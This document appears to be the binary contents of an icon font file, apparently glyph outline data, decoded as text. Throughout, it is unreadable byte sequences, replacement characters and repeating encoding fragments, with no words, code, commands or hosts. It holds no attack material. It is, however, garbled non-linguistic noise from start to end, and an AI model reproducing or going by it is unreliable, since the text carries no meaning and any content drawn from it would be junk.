2���b%	I�))�9I	����'%#!"&54>322>32 &6 ��y��y� 6Fe=	BS���SB	=eF6 ������>�x��x5eud_C(+5++5+(C_due����>����/?O_o���54&+";2654&+";2654&+";264&#!"3!2654&+";2654&+";264&#!"3!2654&+";2654&+";2654&+";267#!"&5463!2�&�&&�&&�&&�&&�&&�&&�&&&�&�&&�&�&�&&�&��&�&&&�&�&&�&&�&&�&&�&&�&�^B��B^^B@B^@�&&�&&��&&�&&��&&�&&�&&�&&��&&�&&���&&�&&&&�&&���&&�&&��&&�&&��&&�&&���B^^B@B^^��/?#!"&5463!2#!"&5463!2#!"&5463!2#!"&5463!2L4�4LL44LL4�4LL44L�L4�4LL44LL4�4LL44L��4LL4�4LL��4LL4�4LL���4LL4�4LL��4LL4�4LL	�/?O_o�#!"&=463!2#!"&=463!2#!"&=463!2#!"&=463!2#!"&=463!2#!"&=463!2#!"&=463!2#!"&=463!2#!"&=463!28(��(88(@(88(��(88(@(8�8(��(88(@(8��8(��(88(@(8�8(��(88(@(8�8(��(88(@(8��8(��(88(@(8�8(��(88(@(88(��(88(@(8 �(88(�(88�(88(�(88��(88(�(88�(88(�(88��(88(�(88��(88(�(88�(88(�(88��(88(�(88�(88(�(88�/?O_#!"&=463!2#!"&=463!2#!"&=463!2#!"&=463!2#!"&=463!2#!"&=463!28(��(88(@(88(��(88(@(88(�@(88(�(8�8(��(88(@(88(�@(88(�(88(�@(88(�(8 �(88(�(88�(88(�(88��(88(�(88�(88(�(88��(88(�(88�(88(�(88y��"/&4?62	62��,�P����P&�P��P�,��jP�����n���#$"'	"/&47	&4?62	62	�P���P�&���P&&P���&�P�&���P&&P���&�P������#+D++"&=#"&=46;546;232  #"'#"$&6$ 
�
@
�

�
@
�
�������rK56$���܏���oo��o|W�@
�

�
@
�

��r��������jK&V|o��oo����ܳ�����0#!"&=463!2  #"'#"$&6$ 
��

@
�������rK56$���܏���oo��o|W�@

@
�r��������jK&V|o��oo����ܳ����)5 $&54762>54&'.7>"&5462z�����z��+i *bkQ��н�Qkb* j*����LhLLhL�����zz���Bm +*i J�yh��QQ��hy�J i*+ m��J��4LL4�4LL���/?O%+"&=46;2%+"&546;2%+"&546;2+"&546;2+"&546;2��������������`��r��@�@r�@��@����n4&"2#"/+"&/&'#"'&'&547>7&/.=46?67&'&547>3267676;27632�Ԗ����#H
	��,/
�1)�
~'H�
�(C
	�

�,/
�1)�	
�$H�
Ԗ�Ԗm�6%2X
%�	l�2
�k	r6

[21
�..9Q

$�
k�2
�k	
w3[20����/;Cg+"&546;2+"&546;2+"&546;2!3!2>!'&'!+#!"&5#"&=463!7>3!2!2@@@@@@���@�`�0
��
o`^B��B^`5FN(@(NF5 ��@��@��@���L%%Ju		�@�LSyuS�@�%44%�f5#!!!"&5465	7#"'	'&/&6762546;2�&�����&??�>

�L�L
>
� X ���
 � &���&��&AJ	A��	J
W���h��##!"&5463!2!&'&!"&5!�(8(��(88(�(`�x
��c�`(8��`(��(88(@(8(D��9�8(����� ,#!"&=46;46;2.  6 $$ ����@��������(�r���^����a�a�@@`��(��������_�^����a�a��2NC5.+";26#!26'.#!"3!"547>3!";26/.#!2W
�
��.�@

��

�@.�$S

�

S$�@

���9I


�
I6>
��
��>�%=$4&"2$4&"2#!"&5463!2?!2"'&763!463!2!2&4&&4&&4&&4�8(�@(88(ч:�:��(8���@6�@*&&*�4&&4&&4&&4& ��(88(@(8�88�8)�@�)'�&&�@���$0"'&76;46;232  >& $$ `
������������(���r���^����a�a`��		@`��2�������(���^����a�a�����$0++"&5#"&54762  >& $$ ^���
?@�����(���r���^����a�a���`?		����������(���^����a�a��
#!.'!!!%#!"&547>3!2�<�<�<_@`&��&�
5@5
�@
����&&�>=(""��=���'#"'&5476.  6 $$ � ��  ! ��������(�r���^����a�a�J��	%�%���(��������_�^����a�a�����3#!"'&?&#"3267672#"$&6$3276&�@*���h��QQ��hw�I�	m�ʬ����zz���k�)'�@&('��Q��н�Qh_
	�
��z�8�zoe����$G!"$'"&5463!23267676;2#!"&4?&#"+"&=!2762�@�h���k�4&&�&�G�a��F*�
&�@&��Ɇ�F*�
A��k�4&���nf�&�&&4�BH�rd�@&&4���rd
Moe�&�/?O_o+"&=46;25+"&=46;25+"&=46;2#!"&=463!25#!"&=463!25#!"&=463!24&#!"3!26#!"&5463!2�
@

@

@

@

@

@
�
�@

�

�@

�

�@

�
�
�@

�
�^B�@B^^B�B^`@

@
�@

@
�@

@
��@

@
�@

@
�@

@
�3@

��
M��B^^B@B^^��!54&"#!"&546;54 32@�Ԗ@8(�@(88( p (8�j��j��(88(@(8������8@���7+"&5&5462#".#"#"&5476763232>32@@
@
@KjK�ך=}\�I���&:�k�~&26]S
&H&�

�&H5KKu�t,4,�	&� x:;*4*&��K#+"&546;227654$ >3546;2+"&="&/&546$ �<��X@@Gv"D�����װD"vG@@X��<��4L4����1!Sk @ G<_b������b_<G �� kS!1����zz�� �"'!"&5463!62&4����&&M4&���&M&�&M& ��-"'!"&5463!62#"&54>4.54632&4����&&M4&�UF
&""""&
F���&M&�&M&���%.D.%���G-Ik"'!"&5463!62#"&54>4.54632#"&54767>4&'&'&54632#"&547>7676'&'.'&54632&4����&&M4&�UF
&""""&
FU��
&'8JSSJ8'&

����

&'.${��{$.'&

����&M&�&M&���%.D.%7���;&'6���6'&;��4�[&$
[2[
$&[��#/37#5#5!#5!!!!!!!#5!#5!5##!35!!!����������������������������������������������������������������������������#'+/37;?3#3#3#3#3#3#3#3#3#3#3#3#3#3#3#3#3????  ^��>>~??�??�??~??~??^??�^^?  ^??������������������������������������4&"2#"'.5463!2�KjKKjv%�'45%�5&5L4�5�&�%jKKjK�@5%�%%�%�5�4L5&�6'��k�54&"2#"'.5463!2#"&'654'.#32�KjKKjv%�'45%�5&5L4�5�&�%�%�'4$.�%%�5&�5�5�&�%jKKjK�@5%�%%�%�5�4L5&�6'45%�%�%54'�&55&�6'
��y�Tdt#!"&'&74676&7>7>76&7>7>76&7>7>76&7>7>63!2#!"3!2676'3!26?6&#!"3!26?6&#!"g(��sA�eM�,*$/
!'&
�JP��$G]��
x�6,&��`
��
h`
��
"9H�v@WkNC<.
&k&
("$p"	.
#u&#	%!'	pJ�vwEF�#

@

��

@

���2#"'	#"'.546763�!''!0#�G�G$/!''!�	
8"��"8
 ��X!	
8"	"8
	����<)!!#"&=!4&"27+#!"&=#"&546;463!232������(8���&4&&4�
�8(�@(8�
qO@8(�(`�(@Oq��8(��&4&&4&@�`
�(88(�
�Oq (8(�`(�q���!)2"&42#!"&546;7>3!2  I��j��j��j��j�3e55e3�gr������`��I�j��j��j�j��1GG1���r��������P2327&7>7;"&#"4?2>54.'%3"&#"#ժ!�9&W��B03&�K5�!�)V�?�@L��'�	
>R�>e;&L:�:%P�>��vO
'h�� N��_"�:-&+#
��:��	'	����+a%3 4'.#"32>54.#"7>7><5'./6$3232#"&#"+JBx)EB_I:I*CRzb3:dtB2P���$$5.3b�[F�|\8!-T>5��Fu��\,�,j�n OrB,<!
5�4wJ]�?tTFi;
2�3j.�p^%/2�+
	S:T}K4W9: #ƕd�fE���97>7676'5.'732>7"#"&#&#"�$
zj=N!�}:0e��%	y�
+t�D3�~U'#B4#
g		'2
%/!:
���T	bRU,7����}%2"/&6;#"&?62+326323!2>?23&'.'.#"&"$#"#&=>764=464.'&#"&'�!~:~!PP!~:~!P��6�,�,$�$%*'
c2N 	
(�$"L��A2�3Yl�!x!*�%��%%��%��
p�P,T	NE	Q7^���oH!+(
3	 *Ue�eu
wg��a�32632$?23&'.5&'&#"&"5$#"#&=>7>4&54&54>.'&#"&'2#".465!#".'&47>32!4&4>Q6�,�,Faw!*'
=~Pl*	
(�$"L��A2�3Yl	�)�!*<7@@7<
�
<7@@7<
 p�P,T	MF
Q7�47ƢHoH!+(
3	 t���JHQ6wh��',686,'$##$',686,'$##$�/?%#!"&=463!2#!"&=463!2#!"&=463!2#!"&=463!2&��&&�&��&�&&&&�&&&��&��&&�&��&&�&&f�&&�&&f�&&�&&f�&&�&&�/?%#!"&=463!2#!"&=463!2#!"&=463!2#!"&=463!2&��&&�&��&��&&�&&��&&�&��&��&&�&��&&�&&f�&&�&&f�&&�&&f�&&�&&�/?%#!"&=463!2#!"&=463!2#!"&=463!2#!"&=463!2&��&&�&&�&&&&�&&&&��&&�&��&&�&&f�&&�&&f�&&�&&f�&&�&&�/?%#!"&=463!2#!"&=463!2#!"&=463!2#!"&=463!2&��&&�&&��&&�&&��&&�&&��&&�&��&&�&&f�&&�&&f�&&�&&f�&&�&&�/?O_o%+"&=46;2+"&=46;2+"&=46;2#!"&=463!2+"&=46;2#!"&=463!2#!"&=463!2#!"&=463!2
�

�

�

�

�

�

��

@
�
�

�

��

@

��

@

��

@
�

�
s�

�
s�

�
��

�
s�

�
��

�
s�

�
s�

�
�/?O#"'&47632#!"&=463!2#!"&=463!2#!"&=463!2#!"&=463!2�
	��		 	
�
�@

�

��

@

��

@

�@

�
�
	 		 	��

�
s�

�
s�

�
s�

�
�/?O#"&54632	#!"&=463!2#!"&=463!2#!"&=463!2#!"&=463!2`	��	

	 �
�@

�

��

@

��

@

�@

�
�	��	
@
	��	�

�
s�

�
s�

�
s�

�
#"'#!"&5463!2632'
�m�w�@w��w�w��
'���*��w��w�w��w������."&462!5	!"3!2654&#!"&5463!2�p�pp�p��@���

@
�^B��B^^B@B^�pp�p���@�@� 
�@

�
 �@B^^B�B^^���k%!7'34#"3276'	!7632k[�[�v
��
6����`�%��`�$65&�%[�[k����
�`����5%���&&�'���4&"2"&'&54 �Ԗ���!��?H?��!,�,Ԗ�ԖmF��!&&!Fm�,�����%" $$ ���������^����a�a`@������^����a�a���-4'.'&"26% 547>7>2"KjK��X��QqYn	243nYqQ�$!+!77!+!$5KK���,ԑ�	���]""]ً�	��9>H7'3&7#!"&5463!2'&#!"3!26=4?6	!762xt�t` �� ^Q�w��w��w@?61��B^^B@B^	@(` �`��\\��\P�`t�t8`� �� ^�Ͼw��w@w�1^B��B^^B~
	@��` \ \�P�+Z#!"&5463!12+"3!26=47676#"'&=# #"'.54>;547632��w��w��w�
M8
pB^^B@B^�
'���sw-

9*##;No��j�'
�#��w��w@w�
"^B��B^^B�

	��*�����
"g`�81T`PSA:'�*��4�/D#!"&5463!2#"'&#!"3!26=4?632"'&4?62	62��w��w��w@?61

��B^^B@B^	@

��B�RnB�Bn^��w��w@w�1
^B��B^^B�
	@
���Bn���nB�C"&=!32"'&46;!"'&4762!#"&4762+!5462�4&���&�4�&���&4�4&��&4&��&4�4�&���&4�4&��&4&��&4�4&���&����6'&'+"&546;267��:	&�&&�&	s�@�	
�Z&&�&&�Z���+6'&''&'+"&546;267667��:	�:	&�&&�&	�	s�@�	
�:�	
�Z&&�&&�Z��:z����6'&''&47667S�:�:�s�@�	
�:�4��:�|�	&546h��!!0a�
�
�
$���#!"&5463!2#!"&5463!2&�&&&��&�&&&@��&&�&&��&&�&&���#!"&5463!2&��&&�&@��&&�&&���&54646&5-���:s��:��:4�:�
	���+&5464646;2+"&5&5-��&�&&�&�:s��:��:�&&��&&�
	�:�
	���&54646;2+"&5-�&�&&�&s��:�&&��&&�
	62#!"&!"&5463!2�4��@��&&�&&-��:��&&&�&�����	"'&4762����4��4����4��4��4Z��f�	"/&47	&4?62S�4����4����44��4���#/54&#!4&+"!"3!;265!26 $$ �&�&�&�&&&�&&@���^����a�a@�&&&�&�&�&&&+�^����a�a�����54&#!"3!26 $$ �&�&&&@���^����a�a@�&&�&&+�^����a�a�����+74/7654/&#"'&#"32?32?6 $$ }��Z��Z��Z��Z����^����a�a���Z��Z��Z��Z�^����a�a�����#4/&"'&"327> $$ [4�h�4[j����^����a�a"Z�i�Z��J�^����a�a�����:F%54&+";264.#"32767632;265467>$ $$ ���o�W��	5!"40K(0?i�+! ":����^����a�a����X�R�dD4!&.uC$=1/J=�^����a�a�����.:%54&+4&#!";#"3!2654&+";26 $$ `��``��������^����a�a�����������^����a�a�����/_#"&=46;.'+"&=32+546;2>++"&=.'#"&=46;>7546;232�m&&m �l&�&l� m&&m �l&�&l�s&�%�&�&��%�&&�%�&�&��%�&&�&l� m&&m �l&�&l� m&&m �,�&��%�&&�%�&�&��%�&&�%�&���#/;"/"/&4?'&4?627626.  6 $$ I�

��

�

��

�

��

�

��
͒������(�r���^����a�aɒ

��

�

��

�

��

�

��
(��������_�^����a�a����� ,	"'&4?6262.  6 $$ ��Z4��f4�4fz�������(�r���^����a�a�Z&4f�f4�(��������_�^����a�a�����	"4'32>&#" $&6$  W���oɒV�󇥔�� z�����zz�8�����YW�˼�[����?����zz�:�zz�@�5K #!#"'&547632!2A4�@%&&K%54'�u%%�&54&K&&���4A��5K��$l$L%%�%54'�&&J&j&��K�5�K #"/&47!"&=463!&4?632�%�u'43'K&&%�@4AA4���&&K&45&�%@6%�u%%K&j&%K5�5K&$l$K&&�u#5��K@!#"'+"&5"/&547632K%K&56$��K5�5K��$l$K&&�#76%�%53'K&&%�@4AA4���&&K&45&�%%�u'5��K�"#"'&54?63246;2632K%�u'45%�u&&J'45%&L4�4L&%54'K%�5%�t%%�$65&K%%���4LL4�@&%%K'���,"&5#"#"'.'547!3462�4&�b��qb>#5���&4�4�&6Uu�e7D#		"�dž�&����/#!"&546262"/"/&47'&463!2�
���&�@&&4�L

r&4���

r

L�&�&�
���4&&�&�L

rI�@&���

r

L�4&&
���s/"/"/&47'&463!2#!"&546262&4���

r

L�&�&�
���&�@&&4�L

r@�@&���

r

L�4&&�
���4&&�&�L

r��##!+"&5!"&=463!46;2!2�8(�`8(�(8�`(88(�8(�(8�(8 �(8�`(88(�8(�(8�(88(�`8��#!"&=463!2�8(�@(88(�(8 �(88(�(88z���5'%+"&5&/&67-.?>46;2%6�.@g.��L4�4L��.g@.
��.@g.
L4�4L
.g@.���g.n.���4LL43�.n.g��g.n.�34LL4�͙.n.g����-  $54&+";264'&+";26/�a����^�����
�

�


�

�����^����a�a��
�
fm��
@
J%55!;263'&#"$4&#"32+#!"&5#"&5463!"&46327632#!2���$�$�8�~+(88�8(+}�(�`8(��(8`�]��]k=��=k]��]��8���,8e�8P88P8�����`(88(�@���M��M����O4&#"327>76$32#"'.#"#".'.54>54&'&54>7>7>32&����z&^��&.������/+>*>J>	W��m7����'
'"''? &4&c��&^|h_b��ml/J@L@
#M6:D
35sҟw$	'%
'	\�t��3#!"&=463!2'.54>54''�
��

@
�1O``O1CZ��Z71O``O1BZ��Z7�@

@
N�]SHH[3`�)Tt��bN�]SHH[3^�)Tt���!1&' 547 $4&#"2654632 '&476 ���=������=嘅�����}�(zVl��'��'���ٌ@�uhy����yhu����9(�}Vz��D#���#D#�������	=CU%7.5474&#"2654632%#"'&547.'&476!27632#76$7&'7+NWb=嘧�}�(zV�i�\j1
z,��X��
Y[6
$!%���'F��u�J�iys�?_�9ɍ?�kyhu�n(�}Vz����YF
KA؉L�a
�0��2�-�F"@Q���sp@�_���!3%54&+";264'&+";26#!"&'&7>2
�

�


�
�
#%;"�";%#<F<������7


���??""??�$$ll2#"'&'	+&/&'&?632	&'&?67>`,@L�����5
`		��
`	�����L�`4�L��H`
����`	��
a	5�
��L@��#37;?Os!!!!%!!!!%!!!!!!!!%!!4&+";26!!%!!!!74&+";26%#!"&546;546;2!546;232� ��`@���� ��`@���� ���@����@�� ��@����
@

@
� ��@��� �� 
@

@
�L4��4LL4�^B@B^�^B@B^�4L� �� @@��@@ � � � @@  

��
��@@ �� � 

��
M�4LL44L`B^^B``B^^B`L���7q.+"&=46;2#"&=".'673!54632#"&=!"+"&=46;2>767>3!54632�<M33K,��	��	
 j8Z4L2B4:;M33K,?		��	
�0N<* .)C=W]xD��0N<* .)C=W]xD?\�-7H)��	��	
�".=']�-7H)�
��w	��	
�<?.>mBZxPV3!�<?.>mBZxPV3!�
���&#"'&'5&6&>7>7&54>$32�d�FK��1A
0)����L���.���٫�C58.H(Y���e����#3C $=463!22>=463!2#!"&5463!2#!"&5463!2���H���&�&/<R.*.R</&�&�&��&&�&&��&&�&������Bɀ&&�4L&&L4�&&f��&&�&&��&&�&&Z� %"'	"/&4762��4���4��4�ͥ���5��5Z����	"'&4?62	62��4��44���5����5��%K%#!".<=#"&54762+!2"'&546;!"/&5463!232
�@�&@<@&�@	����:��&���	�
��& 

��&���&�������&��	

��`&���:$"&462"&462!2#!"&54>7#"&463!2!2�LhLLh�LhLLh�!��
�&&�&��&&�&4hLLhLLhLLhL��%z<
0&4&&)17&4&
&&��#!"&5463!2!2��\�@\��\@\��\���@\��\�\��\ �W�*#!"&547>3!2!"4&5463!2!2W��+�B��"5P+�B@"5����^�=���\@\� \�H#�t3G#�3G:�_H�t�\��\ �@��+32"'&46;#"&4762�&��&�4�&��&4�4&�&4�4&&4�@�"&=!"'&4762!5462�4&�&4�4&&4�4�&��&4&��&����
!!!3!!��������������������������0@67&#".'&'#"'#"'32>54'6#!"&5463!28ADAE=\W{��O[/5dI
kDt���pČe1?*�w�@w��w�w��	(M&
B{Wta28r=Ku?RZ^Gw��T	-�@w��w�w�����$2+37#546375&#"#3!"&5463�w��w���/Dz?s�����w��w��w�@w�S�88�	�����w�w����#'.>4&#"26546326"&462!5!&  !5!!=!!%#!"&5463!2�B^8(�Ԗ���������>��������@�|�K5�5KK55K�^B(8Ԗ�Ԗ�€>�������v����5KK55KK�H��G4&"&#"2654'32#".'#"'#"&54$327.54632@p�p)*Ppp�p)*P�b	'"+`�N*(�a���;2��̓c`." b
PTY9��ppP*)p�ppP*)�b ".`�(*N��ͣ�2�ͣ����`+"'	b
MRZB�����4&"24&"264&"26#"/+"&/&'#"'&547>7&/.=46?67&'&547>3267676;27632#"&'"'#"'&547&'&=4767&547>32626?2#"&'"'#"'&547&'&=4767&547>32626?2��Ԗ���LhLKjKLhLKjK��	�"8w
s%(�")v

�
>�
	�"8x
s"+�")v
�<�
��3zLLz3��
3>8L3)x3
��3zLLz3��
3>8L3)x3
�Ԗ�Ԗ�4LL45KK54LL45KK���
#)0C

wZl/
�
Y�	
N,&�
#)0C	vZl.
�
Y�	
L0"��qG^^Gq�q$ ]G)Fq�qG^^Gq�q$ ]G)Fq��%O#"'#"&'&4>7>7.546$ '&'&'# '32$7>54'�����VZ|�$2$
|��E~E<�|
$2$�|ZV���:�(t}�������X(	
&%(H�w�쉉��x�H(%&	(X�ZT\�MKG���<m$4&"24&#!4654&#+32;254'>4'654&'>7+"&'&#!"&5463!6767>763232&4&&4�N2��`@`%)7&,$)'  
%/0Ӄy�#5 +�1	&<��$]`�{t��5KK5$e:1&+'3T�F0�h��4&&4&�3M:�;b^v�+D2 5#$��I�IJ 2E=\$YJ!$MCeM��-+(K5�5K�K5y�*%A�u]c���=p4&"24&'>54'64&'654&+"+322654&5!267+#"'.'&'&'!"&5463!27>;2&4&&4�+ 5#bW���0/%
  ')$,&7)%`@``2N��h�0##�T3'"(0;e$��5KK5 t��ip��<&	1&4&&4&�#\=E2 JIURI��$#5 2D+�v^b;�:M2g�c]vDEA%!bSV2M�K5�5K(,,��MeCM$!J��@�#"&547&547%6@�?V��8������b%	I�)���94.""'."	67"'.54632>32�+C`\hxeH>Hexh\`C+�ED���4��
#L</��>�oP$$Po�>��Q|I.3MCCM3.I|Q����/����Z$_d�C�+I@$$@I+� (@%#!"&5463!2#!"3!:"&5!"&5463!462�
��w��w@

��B^^B 
���4&�@&&�&4 ` 
�w�w�
 
^B�@B^24��& &�& &�����%573#7.";2634&#"35#347>32#!"&5463!2���FtIG9;HI�x�I��<,tԩw�@w��w�w�z��4DD43EE�����ueB���&#1�s�@w��w�w�����.4&"26#!+"'!"&5463"&463!2#2��&�S3L�l&�c4LL4�4LL4c����@��&��&{�LhLLhL��'?#!"&5463!2#!"3!26546;2"/"/&47'&463!2��w��w��w��@B^^B@B^@�&4��t

r

��&&`��w��w@w�@^B��B^^B@R�&��t

r

��4&&@"&5!"&5463!462	#!"&54&>3!2654&#!*.54&>3!2���4&�@&&�&4 s�w��

@B^^B��

@w��4��& &�& &��3�@w�
 
^B�B^ 
�����
I&5!%5!>732#!"&=4632654&'&'.=463!5463!2!2�J���J���S��q*5&=CKu��uKC=&5*q͍S8( ^B@B^ (8���`N��`Ѣ�΀G�tO6)"M36J[E@@E[J63M")6Ot�G�(8`B^^B`8���%-3�%'&76'&76''&76'&76'&6#5436&76+".=4'>54'6'&&"."&'./"?+"&5463!2�
	2				5



	
	z<: Ʃw�
49[aA)O%-j'&]�]5r,%O)@a[9(	0BA;+


>HC�w��w�w��		5/)
	u

��@w��a-6O�UyU[q	( -	q[UyU�P6$C

+) (	
8&/
&��w�w������'?$4&"2$4&"2#!"&5463!3!267!2#!#!"&5!"'&762&4&&4&&4&&4�8(�@(88(�c==c�(8��*�&�&�*�6�&4&&4&&4&&4& ��(88(@(88HH88`(�@&&�('��@����1d4&'.54654'&#"#"&#"32632327>7#"&#"#"&54654&54>76763232632


	N<�;+gC8�A`1a9�9�g��w����|�9�8aIe$I�VN��z<�:LQJ
	�,�-[%	061I��(�)W,$-������7,oIX(�)o�ζA;=N0
eTZ

(���O#".'&'&'&'.54767>3232>32�e^\3@P	bM���O0#382W#& 9C9
Lĉ"	82<*9FF(W283#0O�Mb	P@3\^eFF9*<28	"��L
9C9 &#��!"3!2654&#!"&5463!2`��B^^B@B^^ީw��w��w@w�^B��B^^B@B^���w��w@w�����#!72#"'	#"'.546763���YY�!''!0#�G�G$/!''!�&�UU�jZ	
8"��"8
 ��X!	
8"	"8
	���EU4'./.#"#".'.'.54>54.'.#"32676#!"&5463!2G55
:8c�7
)1)

05.D
<9�0)$9��w�@w��w�w�W+
AB
7�c
)$+
-.1 �9$)0���<
D.59�@w��w�w��,T1# '327.'327.=.547&54632676TC_L��Ҭ���#+�i�!+*p�DNBN,y[����`m`%i]hbE����m��}a�u&,�SXK��
&$��f9s?
_���#"!#!#!54632��V<%'����Э��HH���	�(ں����R&=4'>54'6'&&"."&'./"?'&54$ ���49[aA)O%-j'&]�]5r,%O)@a[9(	0BA;+


>HC���a�a����oM�a-6O�UyU[q	( -	q[UyU�P6$C

+) (	
8&/
&fM���a�����%+"&54&"32#!"&5463!54 �&@&�Ԗ`(88(�@(88(�r��&&j��j�8(��(88(@(8��������#'+2#!"&5463"!54&#265!375!35!�B^^B��B^^B
�

��
`���^B�@B^^B�B^�
��
�
`��
�������!="&462+"&'&'.=476;+"&'&$'.=476;�p�pp�p�$���!�$qr�
�%���}�#ߺ���pp�p��!�E$�
�rq�ܢ#���
%�
ֻ��!)?"&462"&4624&#!"3!26!.#!"#!"&547>3!2/B//B//B//B�
�@

�
�2�����^B�@B^�\77\�aB//B//B//B/�@

��
��

�~��B^^B@2^5BB5��2���.42##%&'.67#"&=463! 2�5KK5L4�_�u:B&1/&��.-
zB^^B���4L��v��y�KjK��4L[!^k'!A3;):2*�<vTq6^B�B^�L4�$���)��*@��A4#"&54"3!4."#!"&5!"&5>547&5462�;U gI�v��0Z���Z0�L4�@�Ԗ�@4L2RX='�8P8��'=XR� U;Ig0,3lb??bl3���4Lj��jL4*\���(88(�����\���}I/#"/'&/'&?'&'&?'&76?'&7676767676`�
(�5)�0
)��*)
0�)5�(
��
(�5)�0
))��))
0�)5�(
��*)
0�)5�(��
)�5)�0
)*��*)
0�)5�)
��
)�5)�0
)*���5h$4&"24&#!4>54&#"+323254'>4'654&'!267+#"'&#!"&5463!2>767>32!2&4&&4�N2��$YGB
(HGEG  H��Q�#5K4L��i�!<�����;��5KK5 
A#
("/?&}�vh��4&&4&�3M95S+C=�,@QQ9��@@�IJ 2E=L5i�>9eM��E;K5�5K	J7R>@#�zD<����7?s%3#".'.'&'&'.#"!"3!32>$4&"2#!"#"&?&547&'#"&5463!&546323!2`  #A<(H(GY$��2NL4K5#aWTƾh&4&&4�K5��;����=!�i��hv�}&?/"(
#A
 5K��2*!Q@.'!&=C+S59M34L=E2 JI UR@@&4&&4&���5K;E��Lf9>�ig�<Dz�#@>R7J	K�5h4&"24#"."&#"4&#"".#"!54>7#!"&54.'&'.5463246326326&4&&4��IJ 2E=L43M95S+C=�,@QQ9�@@�E;K5��5K	J7R>@#�zD<�gi�>9eM��Z4&&4&<�#5K4LN2��$YGB
(HGEG  H��V���;��5KK5 
A#
("/?&}�vh��i�!<��4<p4.=!32>332653272673264&"2/#"'#"&5#"&54>767>5463!2�@@��2*!	Q@.'!&=C+S59M34L.9E2 JI UR�&4&&4&��Lf6A�ig�6Jy�#@>R7J	K5�5K;E@TƾH  #A<(H(GY$��2NL4K#5#a=4&&4&�D��=�i��hv�}&?/"(
#A
 5KK5��;�����+54&#!764/&"2?64/!26 $$ &�
�[6��[[j6[��&���^����a�a@�&�4[��[6[��[6�&+�^����a�a�����+4/&"!"3!277$ $$ [��6[��
&&��[6j[
���^����a�ae6[j[6�&�&�4[j[��^����a�a�����+4''&"2?;2652?$ $$ ��[6[��[6�&�&�4[���^����a�af6j[[��6[��
&&��[��^����a�a�����+4/&"4&+"'&"2? $$ [6�&�&�4[j[6[j���^����a�ad6[��&&�
�[6��[[j��^����a�a������  $2>767676&67>?&'4&'.'.'."#&6'&6&'3.'.&'&'&&'&6'&>567>#7>7636''&'&&'.'"6&'6'..'/"&'&76.'7>767&.'"76.7"7"#76'&'.'2#22676767765'4.6326&'.'&'"'>7>&&'.54>'>7>67&'&#674&7767>&/45'.67>76'27".#6'>776'>7647>?6#76'6&'676'&67.'&'6.'.#&'.&6'&.5/�a����^����D&"	


	4
	$!	#
	
		
	



 
.0"�Y
	+


!	
	

$	
	"
+


		
	�Α	
		
����^����a�a��

	

			
	

	

		
	
		P� '-(	#	*
$

"
!				
*
!	

(				

	
��$�
		
2
�~�/$4&"2	#"/&547#"32>32�&4&&4��V%54'j&&�'��/덹���:,���{	&4&&4&�V%%l$65&�b��'C��r!"��k[G�+;%!5!!5!!5!#!"&5463!2#!"&5463!2#!"&5463!2����������&��&&�&&��&&�&&��&&�&�������@�&&&&�&&&&�&&&&��{#"'&5&763!2{�'
��**�)��*��)'/!5!#!"&5!3!26=#!5!463!5463!2!2���^B�@B^�&@&`��^B`8(@(8`B^��� B^^B�&&�����B^�(88(�^���G	76#!"'&?	#!"&5476	#"'&5463!2	'&763!2#"'��c�)'&�@*������*�@&('�c���(&�*�cc�*�&'
����*�@&('�c���'(&�*�cc�*�&('���c�'(&�@*��19AS[#"&532327#!"&54>322>32"&462 &6 +&'654'32>32"&462Q�g�Rp|Kx;CB��y��y� 6Fe=
BP���PB
=eF6 ��Ԗ��V����>!pR�g�QBC;xK|��Ԗ���{QNa*+%��x��x5eud_C(+5++5+(C_due2Ԗ�Ԗ�����>�NQ{u�%+*jԖ�Ԗ��p�!Ci4/&#"#".'32?64/&#"327.546326#"/&547'#"/&4?632632��(* 8(!�)(��A�('��)* 8(!U�SxyS�SXXVzxT�TU�SxyS�SXXVzxT�@(� (8 *(���(��'(�(8 ���S�SU�Sx{VXXT�T�S�SU�Sx{VXXT���#!"5467&5432632�������t,Ԟ;F`j�)��������6�,��>�jK?�s��
�!%#!"&7#"&463!2+!'5#�8Ej��jE8�@&&&&@������XYY�&4&&4&�qD�S�%��q%��N\jx��2"&4#"'#"'&7>76326?'&'#"'.'&676326326&'&#"32>'&#"3254?''7�4&&4&l��
�NnbS���VZbR��SD	
zz
	DS��Rb)+U���Sbn�
��\.2Q\dJ'.2Q\dJ.Q2.'Jd\Q2.'Jd`!O�`��	`�����&4&&4�r$#@�B10M�5TNT{L�5T
	II	
T5�L;l'OT4�M01B�@#$�*�3;$*�3;�;3�*$;3�*$�:$/� @@�Qq`��@���"%3<2#!"&5!"&5467>3!263!	!!#!!46!#!�(88(�@(8��(8(�`(�(8D<���+����+�<��8(�`(��8(�`�8(�@(88( 8(�(`�(8(��(������<��`(8��(`����`(8����||?%#"'&54632#"'&#"32654'&#"#"'&54632|�u�d��qܟ�s]
=
��Ofj�L?R@T?��"&�
>
�f?rRX=Ed�u�ds���q��
=
_M�jiL��?T@R?E& �f
>
�=XRr?��b���!1E)!34&'.##!"&5#3463!24&+";26#!"&5463!2����
��
08(��(8��8(@(8��
�

�
�8(��(88(�(`(����1

�`(88(���(88(@

��
�`(88(@(8(��`���#!"&5463!2�w�@w��w�w�`�@w��w�w��/%#!"&=463!2#!"&=463!2#!"&=463!2&��&&�&&��&&�&&��&&�&��&&�&&�&&�&&�&&�&&��@'7G$"&462"&462#!"&=463!2"&462#!"&=463!2#!"&=463!2�p�pp�pp�pp��
�@

�
��p�pp��
�@

�

�@

�
Рpp�p��pp�p���

�
�pp�p���

�
�

�
��<L\l|#"'732654'>75"##5!!&54>54&#"'>3235#!"&=463!2!5346=#'73#!"&=463!2#!"&=463!2}mQjB919+i1$AjM_3<��/BB/.#U_:IdDRE�
�@
�
����k*G�j�
�@
�

�@

�
TP\BX-@8
C)5�XsJ@�$3T4+,:;39SG2S.7<���

�vcc)�(%L�l�}�

��

�
���5e2#!"&=463%&'&5476!2/&'&#"!#"/&'&=4'&?5732767654'&��@�0��2uBo
T25XzrDCBB�Eh:%��)0%HPIP{rQ�9f#-+>;I@KM-/Q"�@@@#-a[��$&P{<�8[;:XICC>.�'5oe71#.0(
l0&%,"J&9%$<=DTI���cs&/6323276727#"327676767654./&'&'737#"'&'&'&54'&54&#!"3!260%
<4�"VRt8<@<
-#=XYhW8+0$"+dT�Lx-'I&JKkm��uw<=V�@�!X@		v
'��|N;!/!$8:I�Ob�V;C#V

&
(���mL.A:9 !./KLwP�M�$��@@
